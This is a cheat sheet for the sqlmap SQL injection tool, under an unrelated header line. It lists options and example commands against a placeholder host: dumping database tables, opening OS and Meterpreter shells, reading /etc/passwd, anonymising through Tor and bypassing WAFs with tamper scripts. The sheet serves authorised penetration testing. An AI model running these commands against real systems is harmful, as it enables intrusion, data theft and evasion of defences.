GARY IS COMING FOR YOU

You shouldn't have done that.

sqlmap Tool Reference

sqlmap is an automated SQL injection testing and exploitation tool. It can detect and exploit SQL injection vulnerabilities in web applications, supporting multiple database management systems.

Basic Usage

  • sqlmap -u <url> - Test URL for SQL injection
  • sqlmap -u "http://target.com/page.php?id=1" - Test specific URL
  • sqlmap -u <url> --dbs - Enumerate databases
  • sqlmap -u <url> -D <database> --tables - Enumerate tables
  • sqlmap -u <url> -D <database> -T <table> --columns - Enumerate columns
  • sqlmap -u <url> -D <database> -T <table> --dump - Dump table data

Target Options

  • -u <url> - Target URL
  • -l <file> - Target list from Burp log file
  • -x <url> - Sitemap URL (XML)
  • -m <file> - Multiple targets from file
  • -r <file> - HTTP request from file
  • -g <query> - Google dork query
  • -c <file> - Configuration file

Request Options

  • --data=<data> - POST data string
  • --cookie=<cookie> - Cookie string
  • --headers=<headers> - HTTP headers
  • --user-agent=<ua> - User-Agent string
  • --referer=<referer> - Referer string
  • --proxy=<proxy> - Use HTTP proxy
  • --tor --tor-type=SOCKS5 --check-tor - Use Tor proxy
  • -H - Set custom HTTP header
  • --method=<method> - HTTP method (GET, POST, PUT, etc.)

Parameter Options

  • -p <parameter> - Test specific parameter
  • --skip=<param> - Skip testing parameter
  • -r <file> - Load HTTP request from file (auto-detect parameters)
  • --param-del=<delimiter> - Parameter delimiter

Enumeration Options

  • --dbs - Enumerate databases
  • --tables - Enumerate tables
  • --columns - Enumerate columns
  • --dump - Dump table entries
  • --dump-all - Dump all databases
  • -D <database> - Specify database
  • -T <table> - Specify table
  • -C <column> - Specify column
  • --schema - Enumerate database schema
  • --count - Count entries in table

Database System Options

  • --dbms=<dbms> - Force database type (MySQL, PostgreSQL, MSSQL, Oracle, SQLite)
  • --dbms-cred=<user:pass> - Database credentials
  • --os=<os> - Force OS type
  • --tamper=<script> - Use tamper script

File Operations

  • --file-read=<file> - Read file from database server
  • --file-write=<file> - Write local file to database server
  • --file-dest=<path> - Remote file path for write operations

Shell Options

  • --sql-shell - Interactive SQL shell
  • --os-shell - Interactive OS shell
  • --os-cmd=<cmd> - Execute OS command
  • --os-pwn - Meterpreter shell
  • --os-smbrelay - SMB relay attack

Detection Options

  • --level=<1-5> - Level of tests (1-5, default 1)
  • --risk=<1-3> - Risk of tests (1-3, default 1)
  • --technique=<technique> - Injection techniques (B, E, U, S, T, Q)
  • --time-sec=<sec> - Seconds to wait for response (default 5)
  • --union-cols=<range> - Column range for UNION tests

Technique Options

  • B - Boolean-based blind
  • E - Error-based
  • U - Union query-based
  • S - Stacked queries
  • T - Time-based blind
  • Q - Inline queries

Output Options

  • --batch - Never ask for user input (use defaults)
  • --verbose=<0-6> - Verbosity level
  • -v <level> - Verbosity level (0-6)
  • --output-dir=<dir> - Output directory

Misc Options

  • --threads=<num> - Max concurrent HTTP requests (default 1)
  • --delay=<sec> - Delay between requests (seconds)
  • --timeout=<sec> - Request timeout (default 30)
  • --retries=<num> - Retries on timeout (default 3)
  • --ignore-code=<code> - Ignore HTTP error codes
  • --ignore-proxy - Ignore default proxy settings

Common Examples

Basic Detection

sqlmap -u "http://target.com/page.php?id=1"

Enumerate Databases

sqlmap -u "http://target.com/page.php?id=1" --dbs

Enumerate Tables

sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

Dump Table

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

POST Request

sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" -p username

From Burp Log

sqlmap -l burp_log.txt --batch

Cookie Injection

sqlmap -u "http://target.com/page.php" --cookie="session=abc123" --dbs

Get OS Shell

sqlmap -u "http://target.com/page.php?id=1" --os-shell

Read File

sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"

Use Tor

sqlmap -u "http://target.com/page.php?id=1" --tor --tor-type=SOCKS5 --check-tor

Tips

  • Use --batch for automated testing (no user interaction)
  • Use -r with Burp log files for easy testing
  • Increase --level and --risk for more thorough testing
  • Use --threads for faster enumeration (be careful with server load)
  • Combine with Burp Suite for complex authentication scenarios
  • Use --tamper scripts to bypass WAFs and filters
  • Always test on authorized systems only
  • Use --proxy to monitor requests with Burp or similar tools
  • Check --check-tor before using Tor to verify connection
  • Use --batch to avoid prompts in automated scripts